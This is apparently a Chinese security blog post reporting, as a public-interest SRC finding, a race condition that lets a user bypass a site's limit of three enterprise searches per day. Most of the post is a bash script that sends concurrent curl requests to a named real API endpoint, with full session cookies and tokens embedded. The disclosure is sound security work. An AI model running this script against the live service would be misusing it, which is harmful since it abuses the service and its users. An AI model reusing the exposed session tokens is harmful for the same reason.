2026-05-20 2026-07-11 某站点查询功能条件竞争前言本次测试属于公益类型的 SRC 条件竞争攻击者可绕过每日次数限制无限查询企业信息 点击右上角的个人中心 点击关联企业,在这个页面查询企业只有每天三次机会 通过条件竞争可以查询无数次,抓取第一次查询的流量包后编写脚本 123456789101112131415161718#!/bin/bash# 并发发送 10 个企业搜索请求,打印每个响应的完整内容# 定义完整的 Cookie 字符串COOKIE="_ud_=b6ef42de305941c4953b9261d4c445e8; ouerrortime_frontuserloginid=0; JSESSIONID=902DA9C024BE75760D46CB1C3A2A79A6; anti_spider_token=634867b6c5264577abff4052c8644dac.93e8f39b92a851b3813a70d905bdae2d9c5ffb2be4459209c027da0a57f6a110; userId=a9b6956d685c45cfa4eeb5fd58beef84; username=zcyk985747353; nickname=阿萨拉赛博保安; JPAAS_JIS_LOGIN_USERID=a9b6956d685c45cfa4eeb5fd58beef84"for i in $(seq 1 10); do ( RESP=$(curl -sk -m 10 \ "https://zcyun.hanweb.com/api-gateway/epolicy-general-server/manager/match/enterprise/search?keyword=并发测试${i}&userId=a9b6956d685c45cfa4eeb5fd58beef84" \ -H "Cookie: ${COOKIE}" 2>/dev/null) echo "========== 请求 ${i} 的响应体 ==========" echo "$RESP" echo "========================================" ) &donewait 前一篇 蚁剑流量特征 后一篇 某充电桩小程序商家后台 XSS